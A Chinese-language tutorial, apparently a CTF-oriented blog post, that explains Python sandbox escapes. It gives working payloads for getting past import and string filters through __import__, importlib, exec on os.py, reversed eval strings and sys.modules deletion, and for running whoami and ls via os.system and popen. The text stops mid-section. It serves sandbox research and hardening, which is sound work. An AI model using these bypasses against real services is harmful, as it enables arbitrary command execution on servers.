一文看懂Python沙箱逃逸

让用户提交 Python 代码并在服务器上执行，是一些 OJ、量化网站重要的服务，很多 CTF 也有类似的题。为了不让恶意用户执行任意的 Python 代码，就需要确保 Python 运行在沙箱中。沙箱经常会禁用一些敏感的函数，例如 os，研究怎么逃逸、防护这类沙箱还是蛮有意思的。

前言

Python 的沙箱逃逸的最终目标就是执行系统任意命令，次一点的写文件，再次一点的读文件。

顺便安利一本书：《流畅的 Python》。这本书有很多中高阶知识点，很全面而且讲的很清楚，如果你看过，相信理解这篇文章的大多数内容都不是问题。

接下来的内容先讲系统命令执行，再讲文件写入、读取，并且均以 oj 为例，库大多以 os 为例。

一、执行系统命令

1. 基础知识

先啰嗦一些基础知识

在 Python 中执行系统命令的方式有：

os
commands：仅限2.x
subprocess
timeit：timeit.sys、timeit.timeit("__import__('os').system('whoami')",number=1)
platform：platform.os、platform.sys、platform.popen('whoami',mode='r',bufsize=-1).read()
pty：pty.spawn('ls')、pty.os
bdb：bdb.os、cgi.sys
cgi：cgi.os、cgi.sys
…

我写了一个脚本，测试了一下所有的导入 os 或者 sys 的库：

#-*-coding:utf8-*-
#ByMacr0phag3
#in2019-05-0719:46:12
#------------------------------------

#this,antigravity库删掉
all_modules_2=[
'BaseHTTPServer','imaplib','shelve','Bastion','anydbm','imghdr','shlex','CDROM','argparse','imp','shutil','CGIHTTPServer','array','importlib','signal','Canvas','ast','imputil','site','ConfigParser','asynchat','inspect','sitecustomize','Cookie','asyncore','io','smtpd','DLFCN','atexit','itertools','smtplib','Dialog','audiodev','json','sndhdr','DocXMLRPCServer','audioop','keyword','socket','FileDialog','base64','lib2to3','spwd','FixTk','bdb','linecache','sqlite3','HTMLParser','binascii','linuxaudiodev','sre','IN','binhex','locale','sre_compile','MimeWriter','bisect','logging','sre_constants','Queue','bsddb','lsb_release','sre_parse','ScrolledText','bz2','macpath','ssl','SimpleDialog','cPickle','macurl2path','stat','SimpleHTTPServer','cProfile','mailbox','statvfs','SimpleXMLRPCServer','cStringIO','mailcap','string','SocketServer','calendar','markupbase','stringold','StringIO','cgi','marshal','stringprep','TYPES','cgitb','math','strop','Tix','chunk','md5','struct','Tkconstants','cmath','mhlib','subprocess','Tkdnd','cmd','mimetools','sunau','Tkinter','code','mimetypes','sunaudio','UserDict','codecs','mimify','symbol','UserList','codeop','mmap','symtable','UserString','collections','modulefinder','sys','_LWPCookieJar','colorsys','multifile','sysconfig','_MozillaCookieJar','commands','multiprocessing','syslog','__builtin__','compileall','mutex','tabnanny','__future__','compiler','netrc','talloc','_abcoll','contextlib','new','tarfile','_ast','cookielib','nis','telnetlib','_bisect','copy','nntplib','tempfile','_bsddb','copy_reg','ntpath','termios','_codecs','crypt','nturl2path','test','_codecs_cn','csv','numbers','textwrap','_codecs_hk','ctypes','opcode','_codecs_iso2022','curses','operator','thread','_codecs_jp','datetime','optparse','threading','_codecs_kr','dbhash','os','time','_codecs_tw','dbm','os2emxpath','timeit','_collections','decimal','ossaudiodev','tkColorChooser','_csv','difflib','parser','tkCommonDialog','_ctypes','dircache','pdb','tkFileDialog','_ctypes_test','dis','pickle','tkFont','_curses','distutils','pickletools','tkMessageBox','_curses_panel','doctest','pipes','tkSimpleDialog','_elementtree','dumbdbm','pkgutil','toaiff','_functools','dummy_thread','platform','token','_hashlib','dummy_threading','plistlib','tokenize','_heapq','email','popen2','trace','_hotshot','encodings','poplib','traceback','_io','ensurepip','posix','ttk','_json','errno','posixfile','tty','_locale','exceptions','posixpath','turtle','_lsprof','fcntl','pprint','types','_md5','filecmp','profile','unicodedata','_multibytecodec','fileinput','pstats','unittest','_multiprocessing','fnmatch','pty','urllib','_osx_support','formatter','pwd','urllib2','_pyio','fpformat','py_compile','urlparse','_random','fractions','pyclbr','user','_sha','ftplib','pydoc','uu','_sha256','functools','pydoc_data','uuid','_sha512','future_builtins','pyexpat','warnings','_socket','gc','quopri','wave','_sqlite3','genericpath','random','weakref','_sre','getopt','re','webbrowser','_ssl','getpass','readline','whichdb','_strptime','gettext','repr','wsgiref','_struct','glob','resource','xdrlib','_symtable','grp','rexec','xml','_sysconfigdata','gzip','rfc822','xmllib','_sysconfigdata_nd','hashlib','rlcompleter','xmlrpclib','_testcapi','heapq','robotparser','xxsubtype','_threading_local','hmac','runpy','zipfile','_warnings','hotshot','sched','zipimport','_weakref','htmlentitydefs','select','zlib','_weakrefset','htmllib','sets','abc','httplib','sgmllib','aifc','ihooks','sha'
]

all_modules_3=[
'AptUrl','hmac','requests_unixsocket','CommandNotFound','apport','hpmudext','resource','Crypto','apport_python_hook','html','rlcompleter','DistUpgrade','apt','http','runpy','HweSupportStatus','apt_inst','httplib2','scanext','LanguageSelector','apt_pkg','idna','sched','NvidiaDetector','aptdaemon','imaplib','secrets','PIL','aptsources','imghdr','secretstorage','Quirks','argparse','imp','select','UbuntuDrivers','array','importlib','selectors','UbuntuSystemService','asn1crypto','inspect','shelve','UpdateManager','ast','io','shlex','__future__','asynchat','ipaddress','shutil','_ast','asyncio','itertools','signal','_asyncio','asyncore','janitor','simplejson','_bisect','atexit','json','site','_blake2','audioop','keyring','sitecustomize','_bootlocale','base64','keyword','six','_bz2','bdb','language_support_pkgs','smtpd','_cffi_backend','binascii','launchpadlib','smtplib','_codecs','binhex','linecache','sndhdr','_codecs_cn','bisect','locale','socket','_codecs_hk','brlapi','logging','socketserver','_codecs_iso2022','builtins','louis','softwareproperties','_codecs_jp','bz2','lsb_release','speechd','_codecs_kr','cProfile','lzma','speechd_config','_codecs_tw','cairo','macaroonbakery','spwd','_collections','calendar','macpath','sqlite3','_collections_abc','certifi','macurl2path','sre_compile','_compat_pickle','cgi','mailbox','sre_constants','_compression','cgitb','mailcap','sre_parse','_crypt','chardet','mako','ssl','_csv','chunk','markupsafe','stat','_ctypes','cmath','marshal','statistics','_ctypes_test','cmd','math','string','_curses','code','mimetypes','stringprep','_curses_panel','codecs','mmap','struct','_datetime','codeop','modual_test','subprocess','_dbm','collections','modulefinder','sunau','_dbus_bindings','colorsys','multiprocessing','symbol','_dbus_glib_bindings','compileall','nacl','symtable','_decimal','concurrent','netrc','sys','_dummy_thread','configparser','nis','sysconfig','_elementtree','contextlib','nntplib','syslog','_functools','copy','ntpath','systemd','_gdbm','copyreg','nturl2path','tabnanny','_hashlib','crypt','numbers','tarfile','_heapq','cryptography','oauth','telnetlib','_imp','csv','olefile','tempfile','_io','ctypes','opcode','termios','_json','cups','operator','test','_locale','cupsext','optparse','textwrap','_lsprof','cupshelpers','orca','_lzma','curses','os','threading','_markupbase','datetime','ossaudiodev','time','_md5','dbm','parser','timeit','_multibytecodec','dbus','pathlib','token','_multiprocessing','deb822','pcardext','tokenize','_opcode','debconf','pdb','trace','_operator','debian','pexpect','traceback','_osx_support','debian_bundle','pickle','tracemalloc','_pickle','decimal','pickletools','tty','_posixsubprocess','defer','pipes','turtle','_pydecimal','difflib','pkg_resources','types','_pyio','dis','pkgutil','typing','_random','distro_info','platform','ufw','_sha1','distro_info_test','plistlib','unicodedata','_sha256','distutils','poplib','unittest','_sha3','doctest','posix','urllib','_sha512','dummy_threading','posixpath','urllib3','_signal','email','pprint','usbcreator','_sitebuiltins','encodings','problem_report','uu','_socket','enum','profile','uuid','_sqlite3','errno','pstats','venv','_sre','faulthandler','pty','wadllib','_ssl','fcntl','ptyprocess','warnings','_stat','filecmp','pwd','wave','_string','fileinput','py_compile','weakref','_strptime','fnmatch','pyatspi','webbrowser','_struct','formatter','pyclbr','wsgiref','_symtable','fractions','pydoc','xdg','_sysconfigdata_m_linux_x86_64-linux-gnu','ftplib','pydoc_data','xdrlib','_testbuffer','functools','pyexpat','xkit','_testcapi','gc','pygtkcompat','xml','_testimportmultiple','genericpath','pymacaroons','xmlrpc','_testmultiphase','getopt','pyrfc3339','xxlimited','_thread','getpass','pytz','xxsubtype','_threading_local','gettext','queue','yaml','_tracemalloc','gi','quopri','zipapp','_warnings','glob','random','zipfile','_weakref','grp','re','zipimport','_weakrefset','gtweak','readline','zlib','_yaml','gzip','reportlab','zope','abc','hashlib','reprlib','aifc','heapq'
]

methods=['os','sys','__builtins__']

results={}
formoduleinall_modules_3:
results[module]={
'flag':0,
'result':{}
}

try:
m=__import__(module)
attrs=dir(m)
formethodinmethods:
ifmethodinattrs:
result='yes'
results[module]['flag']=1
else:
result='no'

results[module]['result'][method]=result

exceptExceptionase:
print(e)

forresultinresults:
ifresults[result]['flag']:
print('[+]'+result)
forrinresults[result]['result']:
print('[-]'+r+':'+results[result]['result'][r])

all_modules_2就是 2.x 的标准库，all_modules_3 就是 3.x 的标准库。

结果相当多，这里就不贴了。这里注意一下，这个文件别命名为 test.py，如果命名为 test 会怎么样呢?可以先猜一猜，后面会给解释。

如果 oj 支持 import 的话，这些库都是高危的，放任不管基本上是坐等被日。所以为了避免过滤不完善导致各种问题，在 Python 沙箱套一层 docker 肯定不会是坏事。

2. 花式 import

首先，禁用 import os 肯定是不行的，因为

importos
importos
importos
...

都可以。如果多个空格也过滤了，Python 能够 import 的可不止 import，还有 __import__：__import__(‘os’)，__import__被干了还有 importlib：importlib.import_module(‘os’).system(‘ls’)

这样就安全了吗?实际上import可以通过其他方式完成。回想一下 import 的原理，本质上就是执行一遍导入的库。这个过程实际上可以用 execfile 来代替：

execfile('/usr/lib/python2.7/os.py')
system('ls')

不过要注意，2.x 才能用，3.x 删了 execfile，不过可以这样：

withopen('/usr/lib/python3.6/os.py','r')asf:
exec(f.read())
system('ls')

这个方法倒是 2.x、3.x 通用的。

不过要使用上面的这两种方法，就必须知道库的路径。其实在大多数的环境下，库都是默认路径。如果 sys 没被干掉的话，还可以确认一下，：

importsys
print(sys.path)

3. 花式处理字符串

代码中要是出现 os，直接不让运行。那么可以利用字符串的各种变化来引入 os：

__import__('so'[::-1]).system('ls')

b='o'
a='s'
__import__(a+b).system('ls')

还可以利用 eval 或者 exec：

>>>eval(')"imaohw"(metsys.)"so"(__tropmi__'[::-1])
macr0phag3
0
>>>exec(')"imaohw"(metsys.so;sotropmi'[::-1])
macr0phag3

顺便说一下，eval、exec 都是相当危险的函数，exec 比 eval 还要危险，它们一定要过滤，因为字符串有很多变形的方式，对字符串的处理可以有：逆序、变量拼接、base64、hex、rot13…等等，太多了。。。

4. 恢复 sys.modules

sys.modules 是一个字典，里面储存了加载过的模块信息。如果 Python 是刚启动的话，所列出的模块就是解释器在启动时自动加载的模块。有些库例如 os 是默认被加载进来的，但是不能直接使用，原因在于 sys.modules 中未经 import 加载的模块对当前空间是不可见的。

如果将 os 从 sys.modules 中剔除，os 就彻底没法用了：

>>>sys.modules['os']='notallowed'
>>>importos
>>>os.system('ls')
Traceback(mostrecentcalllast):
File"<stdin>",line1,in<module>
AttributeError:'str'objecthasnoattribute'system'
>>>

注意，这里不能用 del sys.modules[‘os’]，因为，当 import 一个模块时：import A，检查 sys.modules 中是否已经有 A，如果有则不加载，如果没有则为 A 创建 module 对象，并加载 A。

所以删了 sys.modules[‘os’] 只会让 Python 重新加载一次 os。

看到这你肯定发现了，对于上面的过滤方式，绕过的方式可以是这样：

sys.modules['os']='notallowed'#oj为你加的

delsys.modules['os']
importos
os.system('ls')

还有一种利用 __builtins__ 导入的方式，下面会详细说。

5. 花式执行函数

通过上面内容我们很容易发现，光引入 os 只不过是开始，如果把 system 这个函数干掉，也没法通过os.system执行系统命令，并且这里的system也不是字符串，也没法直接做编码等等操作。我遇到过一个环境，直接在/usr/lib/python2.7/os.py中删了system函数。。。

不过，要明确的是，os 中能够执行系统命令的函数有很多：

print(os.system('whoami'))
print(os.popen('whoami').read())
print(os.popen2('whoami').read())#2.x
print(os.popen3('whoami').read())#2.x
print(os.popen4('whoami').read())#2.x
...

应该还有一些，可以在这里找找：

• 2.x